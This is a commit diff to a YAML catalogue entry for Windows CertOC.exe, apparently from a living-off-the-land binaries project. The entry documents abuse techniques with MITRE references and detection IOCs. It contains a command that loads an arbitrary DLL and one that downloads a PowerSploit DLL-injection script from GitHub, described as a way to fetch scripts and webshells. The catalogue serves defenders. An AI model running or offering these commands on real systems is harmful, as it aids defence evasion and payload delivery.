Update Certoc.yml (#168)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
Ensar Şamil 2021-10-27 12:02:52 +03:00 committed by GitHub
parent 5db35bb397
commit 97f5042a58
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,7 +2,7 @@
Name: CertOC.exe Name: CertOC.exe
Description: Used for installing certificates Description: Used for installing certificates
Author: 'Ensar Samil' Author: 'Ensar Samil'
Created: '2021-10-07' Created: 2021-10-07
Commands: Commands:
- Command: certoc.exe -LoadDLL "C:\test\calc.dll" - Command: certoc.exe -LoadDLL "C:\test\calc.dll"
Description: Loads the target DLL file Description: Loads the target DLL file
@ -10,7 +10,15 @@ Commands:
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows Server 2022
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
Description: Downloads text formatted files
Usecase: Download scripts, webshells etc.
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows Server 2022 OperatingSystem: Windows Server 2022
Full_Path: Full_Path:
- Path: c:\windows\system32\certoc.exe - Path: c:\windows\system32\certoc.exe
@ -20,8 +28,10 @@ Code_Sample:
Detection: Detection:
- IOC: Process creation with given parameter - IOC: Process creation with given parameter
- IOC: Unsigned DLL load via certoc.exe - IOC: Unsigned DLL load via certoc.exe
- IOC: Network connection via certoc.exe
Resources: Resources:
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
- Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20
Acknowledgement: Acknowledgement:
- Person: Ensar Samil - Person: Ensar Samil
Handle: '@sblmsrsn' Handle: '@sblmsrsn'